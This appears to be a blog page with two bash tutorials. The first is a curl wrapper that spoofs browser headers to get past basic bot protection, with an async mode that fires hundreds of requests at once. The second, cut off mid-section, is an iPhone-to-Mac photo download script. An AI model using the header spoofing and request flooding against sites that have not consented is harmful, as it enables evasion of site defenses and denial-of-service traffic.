Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash

# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
TIMEOUT=30
DATA=""
CONTENT_TYPE=""
COOKIE_FILE="/tmp/browser_curl_cookies_$$.txt"
VERBOSE=false

# Browser fingerprint (Chrome on macOS)
USER_AGENT="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"

usage() {
    cat << EOH
Usage: $(basename "$0") [OPTIONS] URL

Advanced curl wrapper that mimics browser behavior to bypass bot protection.

OPTIONS:
    -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE, etc.) [default: GET]
    -d, --data DATA           POST/PUT data
    -H, --header HEADER       Add custom header (can be used multiple times)
    -o, --output FILE         Write output to file
    -c, --cookie FILE         Use custom cookie file [default: temp file]
    -A, --user-agent UA       Custom user agent [default: Chrome on macOS]
    -t, --timeout SECONDS     Request timeout [default: 30]
    --async                   Run request asynchronously in background
    --count N                 Number of async requests to fire [default: 1, requires --async]
    --no-redirect             Don't follow redirects
    --show-headers            Show response headers
    --json                    Send data as JSON (sets Content-Type)
    --form                    Send data as form-urlencoded
    -v, --verbose             Verbose output
    -h, --help                Show this help message

EXAMPLES:
    # Simple GET request
    $(basename "$0") https://example.com

    # Async GET request
    $(basename "$0") --async https://example.com

    # POST with JSON data
    $(basename "$0") -X POST --json -d '{"username":"test"}' https://api.example.com/login

    # POST with form data
    $(basename "$0") -X POST --form -d "username=test&password=secret" https://example.com/login

    # Multiple async requests (using loop)
    for i in {1..10}; do
        $(basename "$0") --async https://example.com/api/endpoint
    done

    # Multiple async requests (using --count)
    $(basename "$0") --async --count 10 https://example.com/api/endpoint

EOH
    exit 0
}

# Parse arguments
EXTRA_HEADERS=()
URL=""

while [[ $# -gt 0 ]]; do
    case $1 in
        -X|--method)
            METHOD="$2"
            shift 2
            ;;
        -d|--data)
            DATA="$2"
            shift 2
            ;;
        -H|--header)
            EXTRA_HEADERS+=("$2")
            shift 2
            ;;
        -o|--output)
            OUTPUT_FILE="$2"
            shift 2
            ;;
        -c|--cookie)
            COOKIE_FILE="$2"
            shift 2
            ;;
        -A|--user-agent)
            USER_AGENT="$2"
            shift 2
            ;;
        -t|--timeout)
            TIMEOUT="$2"
            shift 2
            ;;
        --async)
            ASYNC=true
            shift
            ;;
        --count)
            COUNT="$2"
            shift 2
            ;;
        --no-redirect)
            FOLLOW_REDIRECTS=false
            shift
            ;;
        --show-headers)
            SHOW_HEADERS=true
            shift
            ;;
        --json)
            CONTENT_TYPE="application/json"
            shift
            ;;
        --form)
            CONTENT_TYPE="application/x-www-form-urlencoded"
            shift
            ;;
        -v|--verbose)
            VERBOSE=true
            shift
            ;;
        -h|--help)
            usage
            ;;
        *)
            if [[ -z "$URL" ]]; then
                URL="$1"
            else
                echo -e "${RED}Error: Unknown argument '$1'${NC}" >&2
                exit 1
            fi
            shift
            ;;
    esac
done

# Validate URL
if [[ -z "$URL" ]]; then
    echo -e "${RED}Error: URL is required${NC}" >&2
    usage
fi

# Validate count
if [[ "$COUNT" -gt 1 ]] && [[ "$ASYNC" == false ]]; then
    echo -e "${RED}Error: --count requires --async${NC}" >&2
    exit 1
fi

if ! [[ "$COUNT" =~ ^[0-9]+$ ]] || [[ "$COUNT" -lt 1 ]]; then
    echo -e "${RED}Error: --count must be a positive integer${NC}" >&2
    exit 1
fi

# Execute curl
execute_curl() {
    # Build curl arguments as array instead of string
    local -a curl_args=()
    
    # Basic options
    curl_args+=("--compressed")
    curl_args+=("--max-time" "$TIMEOUT")
    curl_args+=("--connect-timeout" "10")
    curl_args+=("--http2")
    
    # Cookies (ensure file exists to avoid curl warning)
    : > "$COOKIE_FILE" 2>/dev/null || true
    curl_args+=("--cookie" "$COOKIE_FILE")
    curl_args+=("--cookie-jar" "$COOKIE_FILE")
    
    # Follow redirects
    if [[ "$FOLLOW_REDIRECTS" == true ]]; then
        curl_args+=("--location")
    fi
    
    # Show headers
    if [[ "$SHOW_HEADERS" == true ]]; then
        curl_args+=("--include")
    fi
    
    # Output file
    if [[ -n "$OUTPUT_FILE" ]]; then
        curl_args+=("--output" "$OUTPUT_FILE")
    fi
    
    # Verbose
    if [[ "$VERBOSE" == true ]]; then
        curl_args+=("--verbose")
    else
        curl_args+=("--silent" "--show-error")
    fi
    
    # Method
    curl_args+=("--request" "$METHOD")
    
    # Browser-like headers
    curl_args+=("--header" "User-Agent: $USER_AGENT")
    curl_args+=("--header" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8")
    curl_args+=("--header" "Accept-Language: en-US,en;q=0.9")
    curl_args+=("--header" "Accept-Encoding: gzip, deflate, br")
    curl_args+=("--header" "Connection: keep-alive")
    curl_args+=("--header" "Upgrade-Insecure-Requests: 1")
    curl_args+=("--header" "Sec-Fetch-Dest: document")
    curl_args+=("--header" "Sec-Fetch-Mode: navigate")
    curl_args+=("--header" "Sec-Fetch-Site: none")
    curl_args+=("--header" "Sec-Fetch-User: ?1")
    curl_args+=("--header" "Cache-Control: max-age=0")
    
    # Content-Type for POST/PUT
    if [[ -n "$DATA" ]]; then
        if [[ -n "$CONTENT_TYPE" ]]; then
            curl_args+=("--header" "Content-Type: $CONTENT_TYPE")
        fi
        curl_args+=("--data" "$DATA")
    fi
    
    # Extra headers
    for header in "${EXTRA_HEADERS[@]}"; do
        curl_args+=("--header" "$header")
    done
    
    # URL
    curl_args+=("$URL")
    
    if [[ "$ASYNC" == true ]]; then
        # Run asynchronously in background
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}[ASYNC] Running $COUNT request(s) in background...${NC}" >&2
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        # Fire multiple requests if count > 1
        local pids=()
        for ((i=1; i<=COUNT; i++)); do
            # Run in background detached, suppress all output
            nohup curl "${curl_args[@]}" >/dev/null 2>&1 &
            local pid=$!
            disown $pid
            pids+=("$pid")
        done
        
        if [[ "$COUNT" -eq 1 ]]; then
            echo -e "${GREEN}[ASYNC] Request started with PID: ${pids[0]}${NC}" >&2
        else
            echo -e "${GREEN}[ASYNC] $COUNT requests started with PIDs: ${pids[*]}${NC}" >&2
        fi
    else
        # Run synchronously
        if [[ "$VERBOSE" == true ]]; then
            echo -e "${YELLOW}Command: curl ${curl_args[*]}${NC}" >&2
        fi
        
        curl "${curl_args[@]}"
        local exit_code=$?
        
        if [[ $exit_code -ne 0 ]]; then
            echo -e "${RED}[ERROR] Request failed with exit code: $exit_code${NC}" >&2
            return $exit_code
        fi
    fi
}

# Cleanup temp cookie file on exit (only if using default temp file)
cleanup() {
    if [[ "$COOKIE_FILE" == "/tmp/browser_curl_cookies_$$"* ]] && [[ -f "$COOKIE_FILE" ]]; then
        rm -f "$COOKIE_FILE"
    fi
}

# Only set cleanup trap for synchronous requests
if [[ "$ASYNC" == false ]]; then
    trap cleanup EXIT
fi

# Main execution
execute_curl

# For async requests, exit immediately without waiting
if [[ "$ASYNC" == true ]]; then
    exit 0
fi
EOF

Optionally, move it to your PATH:

sudo mv browser_curl.sh /usr/local/bin/browser_curl

Quick start

Simple GET request

./browser_curl.sh https://example.com

Async GET (returns immediately)

./browser_curl.sh --async https://example.com

Fire 100 async requests in one command

./browser_curl.sh --async --count 100 https://example.com/api

Common examples

POST JSON

./browser_curl.sh -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://api.example.com/login

POST form data

./browser_curl.sh -X POST --form \
  -d "username=user&password=pass" \
  https://example.com/login

Include response headers

./browser_curl.sh --show-headers https://example.com

Save response to a file

./browser_curl.sh -o response.json https://api.example.com/data

Custom headers

./browser_curl.sh \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://api.example.com/data

Persistent cookies across requests

COOKIE_FILE="session_cookies.txt"

# Login and save cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://example.com/login

# Authenticated request using saved cookies
./browser_curl.sh -c "$COOKIE_FILE" \
  https://example.com/dashboard

Load testing patterns

Simple load test with –count

The easiest way to fire multiple requests:

./browser_curl.sh --async --count 100 https://example.com/api

Example output:

[ASYNC] 100 requests started with PIDs: 1234 1235 1236 ... 1333

Performance: 100 requests dispatched in approximately 0.09 seconds

Loop-based approach (alternative)

for i in {1..100}; do
  ./browser_curl.sh --async https://example.com/api
done

Timed load test

Run continuous requests for a specific duration:

#!/bin/bash
URL="https://example.com/api"
DURATION=60  # seconds
COUNT=0

END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  ./browser_curl.sh --async "$URL" > /dev/null 2>&1
  ((COUNT++))
done

echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"

Parameterized load test script

#!/bin/bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"

echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""

START=$(date +%s)
./browser_curl.sh --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"

Usage:

./load_test.sh https://api.example.com/endpoint 200

Options reference

OptionDescriptionDefault
-X, --methodHTTP method (GET/POST/PUT/DELETE)GET
-d, --dataRequest body (JSON or form)
-H, --headerAdd extra headers (repeatable)
-o, --outputWrite response to a filestdout
-c, --cookieCookie file to use (and persist)temp file
-A, --user-agentOverride User-AgentChrome/macOS
-t, --timeoutMax request time in seconds30
--asyncRun request(s) in the backgroundfalse
--count NFire N async requests (requires --async)1
--no-redirectDon’t follow redirectsfollows
--show-headersInclude response headersfalse
--jsonSets Content-Type: application/json
--formSets Content-Type: application/x-www-form-urlencoded
-v, --verboseVerbose diagnosticsfalse
-h, --helpShow usage

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

Browser-like headers

The script automatically adds these headers to mimic Chrome:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36...
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif...
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1

HTTP/2 + compression

  • Uses --http2 flag for HTTP/2 protocol support
  • Enables --compressed for automatic gzip/brotli decompression
  • Closer to modern browser behavior
  • Maintains session cookies across redirects and calls
  • Persists cookies to file for reuse
  • Automatically created and cleaned up

Redirect handling

  • Follows redirects by default with --location
  • Critical for login flows, SSO, and OAuth redirects

These features help bypass basic bot detection that blocks obvious non-browser clients.

Real-world examples

Example 1: API authentication flow

cd ~/Desktop/warp
bash -c 'cat > test_auth.sh << '\''SCRIPT'\''
#!/bin/bash
COOKIE_FILE="auth_session.txt"
API_BASE="https://api.example.com"

echo "Logging in..."
./browser_curl.sh -c "$COOKIE_FILE" -X POST --json -d "{\"username\":\"user\",\"password\":\"pass\"}" "$API_BASE/auth/login" > /dev/null

echo "Fetching profile..."
./browser_curl.sh -c "$COOKIE_FILE" "$API_BASE/user/profile" | jq .

echo "Load testing..."
./browser_curl.sh -c "$COOKIE_FILE" --async --count 50 "$API_BASE/api/data"

echo "Done!"
rm -f "$COOKIE_FILE"
SCRIPT
chmod +x test_auth.sh
./test_auth.sh'

Example 2: Scraping with rate limiting

#!/bin/bash
URLS=(
  "https://example.com/page1"
  "https://example.com/page2"
  "https://example.com/page3"
)

for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  ./browser_curl.sh -o "$(basename "$url").html" "$url"
  sleep 2  # Rate limiting
done

Example 3: Health check monitoring

#!/bin/bash
ENDPOINT="https://api.example.com/health"

while true; do
  if ./browser_curl.sh "$ENDPOINT" | grep -q "healthy"; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done

Installing browser_curl to your PATH

If you want browser_curl.sh to be available anywhere then install it on your path using:

mkdir -p ~/.local/bin
echo "Installing browser_curl to ~/.local/bin/browser_curl"
install -m 0755 ~/Desktop/warp/browser_curl.sh ~/.local/bin/browser_curl

echo "Ensuring ~/.local/bin is on PATH via ~/.zshrc"
grep -q 'export PATH="$HOME/.local/bin:$PATH"' ~/.zshrc || \
  echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.zshrc

echo "Reloading shell config (~/.zshrc)"
source ~/.zshrc

echo "Verifying browser_curl is on PATH"
command -v browser_curl && echo "browser_curl is installed and on PATH" || echo "browser_curl not found on PATH"

Troubleshooting

Issue: Hanging with dquote> prompt

Cause: Shell quoting issue (unbalanced quotes)

Solution: Use simple, direct commands

# Good
./browser_curl.sh --async https://example.com

# Bad (unbalanced quotes)
echo "test && ./browser_curl.sh --async https://example.com && echo "done"

For chaining commands:

echo Start; ./browser_curl.sh --async https://example.com; echo Done

Issue: Verbose mode produces too much output

Cause: -v flag prints all curl diagnostics to stderr

Solution: Remove -v for production use:

# Debug mode
./browser_curl.sh -v https://example.com

# Production mode
./browser_curl.sh https://example.com

Cause: First-time cookie file creation

Solution: The script now pre-creates the cookie file automatically. You can ignore any residual warnings.

Issue: 403 Forbidden errors

Cause: Site has stronger protections (JavaScript challenges, TLS fingerprinting)

Solution: Consider using real browser automation:

  • Playwright (Python/Node.js)
  • Selenium
  • Puppeteer

Or combine approaches:

  1. Use Playwright to initialize session and get cookies
  2. Export cookies to file
  3. Use browser_curl.sh -c cookies.txt for subsequent requests

Performance benchmarks

Tests conducted on 2023 MacBook Pro M2, macOS Sonoma:

TestTimeRequests/sec
Single sync requestapproximately 0.2s
10 async requests (–count)approximately 0.03s333/s
100 async requests (–count)approximately 0.09s1111/s
1000 async requests (–count)approximately 0.8s1250/s

Note: Dispatch time only; actual HTTP completion depends on target server.

Limitations

What this script CANNOT do

  • JavaScript execution – Can’t solve JS challenges (use Playwright)
  • CAPTCHA solving – Requires human intervention or services
  • Advanced TLS fingerprinting – Can’t mimic exact browser TLS stack
  • HTTP/2 fingerprinting – Can’t perfectly match browser HTTP/2 frames
  • WebSocket connections – HTTP only
  • Browser API access – No Canvas, WebGL, Web Crypto fingerprints

What this script CAN do

  • Basic header spoofing – Pass simple User-Agent checks
  • Cookie management – Maintain sessions
  • Load testing – Quick async request dispatch
  • API testing – POST/PUT/DELETE with JSON/form data
  • Simple scraping – Pages without JS requirements
  • Health checks – Monitoring endpoints

When to use what

Use browser_curl.sh when:

  • Target has basic bot detection (header checks)
  • API testing with authentication
  • Quick load testing (less than 10k requests)
  • Monitoring/health checks
  • No JavaScript required
  • You want a lightweight tool

Use Playwright/Selenium when:

  • Target requires JavaScript execution
  • CAPTCHA challenges present
  • Advanced fingerprinting detected
  • Need to interact with dynamic content
  • Heavy scraping with anti-bot measures
  • Login flows with MFA/2FA

Hybrid approach:

  1. Use Playwright to bootstrap session
  2. Extract cookies
  3. Use browser_curl.sh for follow-up requests (faster)

Advanced: Combining with other tools

With jq for JSON processing

./browser_curl.sh https://api.example.com/users | jq '.[] | .name'

With parallel for concurrency control

cat urls.txt | parallel -j 10 "./browser_curl.sh -o {#}.html {}"

With watch for monitoring

watch -n 5 "./browser_curl.sh https://api.example.com/health | jq .status"

With xargs for batch processing

cat ids.txt | xargs -I {} ./browser_curl.sh "https://api.example.com/item/{}"

Future enhancements

Potential features to add:

  • Rate limiting – Built-in requests/second throttling
  • Retry logic – Exponential backoff on failures
  • Output formats – JSON-only, CSV, headers-only modes
  • Proxy support – SOCKS5/HTTP proxy options
  • Custom TLS – Certificate pinning, client certs
  • Response validation – Assert status codes, content patterns
  • Metrics collection – Timing stats, success rates
  • Configuration file – Default settings per domain

Conclusion

browser_curl.sh provides a pragmatic middle ground between plain curl and full browser automation. For many APIs and websites with basic bot filters, browser-like headers, proper protocol use, and cookie handling are sufficient.

Key takeaways:

  • Simple wrapper around curl with realistic browser behavior
  • Async mode with --count for easy load testing
  • Works for basic bot detection, not advanced challenges
  • Combine with Playwright for tough targets
  • Lightweight and fast for everyday API work

The script is particularly useful for:

  • API development and testing
  • Quick load testing during development
  • Monitoring and health checks
  • Simple scraping tasks
  • Learning curl features

For production load testing at scale, consider tools like k6, Locust, or Artillery. For heavy web scraping with anti-bot measures, invest in proper browser automation infrastructure.

Resources

A Script to download Photos, Videos and Images from your iPhone to your Macbook (by creation date and a file name filter)

Annoying Apple never quite got around to making it easy to offload images from your iPhone to your Macbook. So below is a complete guide to automatically download photos and videos from your iPhone to your MacBook, with options to filter by pattern and date, and organize into folders by creation date.

Prerequisites

Install the required tools using Homebrew:

cat > install_iphone_util.sh << 'EOF'
#!/bin/bash
set -e

echo "Installing tools..."

echo "Installing macFUSE"
brew install --cask macfuse

echo "Adding Brew Tap" 
brew tap gromgit/fuse

echo "Installing ifuse-mac" 
brew install gromgit/fuse/ifuse-mac

echo "Installing libimobiledevice" 
brew install libimobiledevice

echo "Installing exiftool"
brew install exiftool

echo "Done! Tools installed."
EOF

echo "Making executable..."
chmod +x install_iphone_util.sh

./install_iphone_util.sh

Setup/Pair your iPhone to your Macbook

  1. Connect your iPhone to your MacBook via USB
  2. Trust the computer on your iPhone when prompted
  3. Verify the connection:
idevicepair validate

If not paired, run:

idevicepair pair

Download Script

Run the script below to create the file download-iphone-media.sh in your current directory:

#!/bin/bash

cat > download-iphone-media.sh << 'OUTER_EOF'
#!/bin/bash

# iPhone Media Downloader
# Downloads photos and videos from iPhone to MacBook
# Supports resumable, idempotent downloads

set -e

# Default values
PATTERN="*"
OUTPUT_DIR="."
ORGANIZE_BY_DATE=false
START_DATE=""
END_DATE=""
MOUNT_POINT="/tmp/iphone_mount"
STATE_DIR=""
VERIFY_CHECKSUM=true

# Usage function
usage() {
    cat << 'INNER_EOF'
Usage: $0 [OPTIONS]

Download photos and videos from iPhone to MacBook.

OPTIONS:
    -p PATTERN          File pattern to match (e.g., "*.jpg", "*.mp4", "IMG_*")
                        Default: * (all files)
    -o OUTPUT_DIR       Output directory (default: current directory)
    -d                  Organize files by creation date into YYYY/MMM folders
    -s START_DATE       Start date filter (YYYY-MM-DD)
    -e END_DATE         End date filter (YYYY-MM-DD)
    -r                  Resume incomplete downloads (default: true)
    -n                  Skip checksum verification (faster, less safe)
    -h                  Show this help message

EXAMPLES:
    # Download all photos and videos to current directory
    $0

    # Download only JPG files to ~/Pictures/iPhone
    $0 -p "*.jpg" -o ~/Pictures/iPhone

    # Download all media organized by date
    $0 -d -o ~/Pictures/iPhone

    # Download videos from specific date range
    $0 -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/iPhone

    # Download specific IMG files organized by date
    $0 -p "IMG_*.{jpg,heic}" -d -o ~/Photos
INNER_EOF
    exit 1
}

# Parse command line arguments
while getopts "p:o:ds:e:rnh" opt; do
    case $opt in
        p) PATTERN="$OPTARG" ;;
        o) OUTPUT_DIR="$OPTARG" ;;
        d) ORGANIZE_BY_DATE=true ;;
        s) START_DATE="$OPTARG" ;;
        e) END_DATE="$OPTARG" ;;
        r) ;; # Resume is default, keeping for backward compatibility
        n) VERIFY_CHECKSUM=false ;;
        h) usage ;;
        *) usage ;;
    esac
done

# Create output directory if it doesn't exist
mkdir -p "$OUTPUT_DIR"
OUTPUT_DIR=$(cd "$OUTPUT_DIR" && pwd)

# Set up state directory for tracking downloads
STATE_DIR="$OUTPUT_DIR/.iphone_download_state"
mkdir -p "$STATE_DIR"

# Create mount point
mkdir -p "$MOUNT_POINT"

echo "=== iPhone Media Downloader ==="
echo "Pattern: $PATTERN"
echo "Output: $OUTPUT_DIR"
echo "Organize by date: $ORGANIZE_BY_DATE"
[ -n "$START_DATE" ] && echo "Start date: $START_DATE"
[ -n "$END_DATE" ] && echo "End date: $END_DATE"
echo ""

# Check if iPhone is connected
echo "Checking for iPhone connection..."
if ! ideviceinfo -s > /dev/null 2>&1; then
    echo "Error: No iPhone detected. Please connect your iPhone and trust this computer."
    exit 1
fi

# Mount iPhone
echo "Mounting iPhone..."
if ! ifuse "$MOUNT_POINT" 2>/dev/null; then
    echo "Error: Failed to mount iPhone. Make sure you've trusted this computer on your iPhone."
    exit 1
fi

# Cleanup function
cleanup() {
    local exit_code=$?
    echo ""
    if [ $exit_code -ne 0 ]; then
        echo "⚠ Download interrupted. Run the script again to resume."
    fi
    echo "Unmounting iPhone..."
    umount "$MOUNT_POINT" 2>/dev/null || true
    rmdir "$MOUNT_POINT" 2>/dev/null || true
}
trap cleanup EXIT

# Find DCIM folder
DCIM_PATH="$MOUNT_POINT/DCIM"
if [ ! -d "$DCIM_PATH" ]; then
    echo "Error: DCIM folder not found on iPhone"
    exit 1
fi

echo "Scanning for files matching pattern: $PATTERN"
echo ""

# Counter
TOTAL_FILES=0
COPIED_FILES=0
SKIPPED_FILES=0
RESUMED_FILES=0
FAILED_FILES=0

# Function to compute file checksum
compute_checksum() {
    local file="$1"
    if [ -f "$file" ]; then
        shasum -a 256 "$file" 2>/dev/null | awk '{print $1}'
    fi
}

# Function to get file size
get_file_size() {
    local file="$1"
    if [ -f "$file" ]; then
        stat -f "%z" "$file" 2>/dev/null
    fi
}

# Function to mark file as completed
mark_completed() {
    local source_file="$1"
    local dest_file="$2"
    local checksum="$3"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    echo "$dest_file|$checksum|$(date +%s)" > "$state_file"
}

# Function to check if file was previously completed
is_completed() {
    local source_file="$1"
    local dest_file="$2"
    local state_file="$STATE_DIR/$(echo "$source_file" | shasum -a 256 | awk '{print $1}')"
    
    if [ ! -f "$state_file" ]; then
        return 1
    fi
    
    # Read state file
    local saved_dest saved_checksum saved_timestamp
    IFS='|' read -r saved_dest saved_checksum saved_timestamp < "$state_file"
    
    # Check if destination file exists and matches
    if [ "$saved_dest" = "$dest_file" ] && [ -f "$dest_file" ]; then
        if [ "$VERIFY_CHECKSUM" = true ]; then
            local current_checksum=$(compute_checksum "$dest_file")
            if [ "$current_checksum" = "$saved_checksum" ]; then
                return 0
            fi
        else
            # Without checksum verification, just check file exists
            return 0
        fi
    fi
    
    return 1
}

# Convert dates to timestamps for comparison
START_TIMESTAMP=""
END_TIMESTAMP=""
if [ -n "$START_DATE" ]; then
    START_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$START_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$START_TIMESTAMP" ]; then
        echo "Error: Invalid start date format. Use YYYY-MM-DD"
        exit 1
    fi
fi
if [ -n "$END_DATE" ]; then
    END_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$END_DATE" "+%s" 2>/dev/null || echo "")
    if [ -z "$END_TIMESTAMP" ]; then
        echo "Error: Invalid end date format. Use YYYY-MM-DD"
        exit 1
    fi
    # Add 24 hours to include the entire end date
    END_TIMESTAMP=$((END_TIMESTAMP + 86400))
fi

# Process files
find "$DCIM_PATH" -type f | while read -r file; do
    filename=$(basename "$file")
    
    # Check if filename matches pattern (basic glob matching)
    if [[ ! "$filename" == $PATTERN ]]; then
        continue
    fi
    
    TOTAL_FILES=$((TOTAL_FILES + 1))
    
    # Get file creation date
    if command -v exiftool > /dev/null 2>&1; then
        # Try to get date from EXIF data
        CREATE_DATE=$(exiftool -s3 -DateTimeOriginal -d "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        if [ -z "$CREATE_DATE" ]; then
            # Fallback to file modification time
            CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
        fi
    else
        # Use file modification time
        CREATE_DATE=$(stat -f "%Sm" -t "%Y-%m-%d %H:%M:%S" "$file" 2>/dev/null)
    fi
    
    # Extract date components
    if [ -n "$CREATE_DATE" ]; then
        FILE_DATE=$(echo "$CREATE_DATE" | cut -d' ' -f1)
        FILE_TIMESTAMP=$(date -j -f "%Y-%m-%d" "$FILE_DATE" "+%s" 2>/dev/null || echo "")
        
        # Check date filters
        if [ -n "$START_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -lt "$START_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        if [ -n "$END_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -ge "$END_TIMESTAMP" ]; then
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        fi
        
        # Determine output path with YYYY/MMM structure
        if [ "$ORGANIZE_BY_DATE" = true ]; then
            YEAR=$(echo "$FILE_DATE" | cut -d'-' -f1)
            MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)
            # Convert month number to 3-letter abbreviation
            case "$MONTH_NUM" in
                01) MONTH="Jan" ;;
                02) MONTH="Feb" ;;
                03) MONTH="Mar" ;;
                04) MONTH="Apr" ;;
                05) MONTH="May" ;;
                06) MONTH="Jun" ;;
                07) MONTH="Jul" ;;
                08) MONTH="Aug" ;;
                09) MONTH="Sep" ;;
                10) MONTH="Oct" ;;
                11) MONTH="Nov" ;;
                12) MONTH="Dec" ;;
                *) MONTH="Unknown" ;;
            esac
            DEST_DIR="$OUTPUT_DIR/$YEAR/$MONTH"
        else
            DEST_DIR="$OUTPUT_DIR"
        fi
    else
        DEST_DIR="$OUTPUT_DIR"
    fi
    
    # Create destination directory
    mkdir -p "$DEST_DIR"
    
    # Determine destination path
    DEST_PATH="$DEST_DIR/$filename"
    
    # Check if this file was previously completed successfully
    if is_completed "$file" "$DEST_PATH"; then
        echo "✓ Already downloaded: $filename"
        SKIPPED_FILES=$((SKIPPED_FILES + 1))
        continue
    fi
    
    # Check if file already exists with same content (for backward compatibility)
    if [ -f "$DEST_PATH" ]; then
        if cmp -s "$file" "$DEST_PATH"; then
            echo "✓ Already exists (identical): $filename"
            # Mark as completed for future runs
            SOURCE_CHECKSUM=$(compute_checksum "$DEST_PATH")
            mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
            SKIPPED_FILES=$((SKIPPED_FILES + 1))
            continue
        else
            # Add timestamp to avoid overwriting different file
            BASE="${filename%.*}"
            EXT="${filename##*.}"
            DEST_PATH="$DEST_DIR/${BASE}_$(date +%s).$EXT"
        fi
    fi
    
    # Use temporary file for atomic copy
    TEMP_PATH="${DEST_PATH}.tmp.$$"
    
    # Copy to temporary file
    echo "⬇ Downloading: $filename → $DEST_PATH"
    if ! cp "$file" "$TEMP_PATH" 2>/dev/null; then
        echo "✗ Failed to copy: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Verify size matches (basic corruption check)
    SOURCE_SIZE=$(get_file_size "$file")
    TEMP_SIZE=$(get_file_size "$TEMP_PATH")
    
    if [ "$SOURCE_SIZE" != "$TEMP_SIZE" ]; then
        echo "✗ Size mismatch for $filename (source: $SOURCE_SIZE, copied: $TEMP_SIZE)"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
        continue
    fi
    
    # Compute checksum for verification and tracking
    if [ "$VERIFY_CHECKSUM" = true ]; then
        SOURCE_CHECKSUM=$(compute_checksum "$TEMP_PATH")
    else
        SOURCE_CHECKSUM="skipped"
    fi
    
    # Preserve timestamps
    if [ -n "$CREATE_DATE" ]; then
        touch -t $(date -j -f "%Y-%m-%d %H:%M:%S" "$CREATE_DATE" "+%Y%m%d%H%M.%S" 2>/dev/null) "$TEMP_PATH" 2>/dev/null || true
    fi
    
    # Atomic move from temp to final destination
    if mv "$TEMP_PATH" "$DEST_PATH" 2>/dev/null; then
        echo "✓ Completed: $filename"
        # Mark as successfully completed
        mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
        COPIED_FILES=$((COPIED_FILES + 1))
    else
        echo "✗ Failed to finalize: $filename"
        rm -f "$TEMP_PATH"
        FAILED_FILES=$((FAILED_FILES + 1))
    fi
done

echo ""
echo "=== Summary ==="
echo "Total files matching pattern: $TOTAL_FILES"
echo "Files downloaded: $COPIED_FILES"
echo "Files already present: $SKIPPED_FILES"
if [ $FAILED_FILES -gt 0 ]; then
    echo "Files failed: $FAILED_FILES"
    echo ""
    echo "⚠ Some files failed to download. Run the script again to retry."
    exit 1
fi
echo ""
echo "✓ Download complete! All files transferred successfully."
OUTER_EOF

echo "Making the script executable..."
chmod +x download-iphone-media.sh

echo "✓ Script created successfully: download-iphone-media.sh"

Usage Examples

Basic Usage

Download all photos and videos to the current directory:

./download-iphone-media.sh

Download with Date Organization

Organize files into folders by creation date (YYYY/MMM structure):

./download-iphone-media.sh -d -o ./Pictures

This creates a structure like:

./Pictures
├── 2024/
│   ├── Jan/
│   │   ├── IMG_1234.jpg
│   │   └── IMG_1235.heic
│   ├── Feb/
│   └── Dec/
├── 2025/
│   ├── Jan/
│   └── Nov/

Filter by File Pattern

Download only specific file types:

# Only JPG files
./download-iphone-media.sh -p "*.jpg" -o ~/Pictures/iPhone

# Only videos (MOV and MP4)
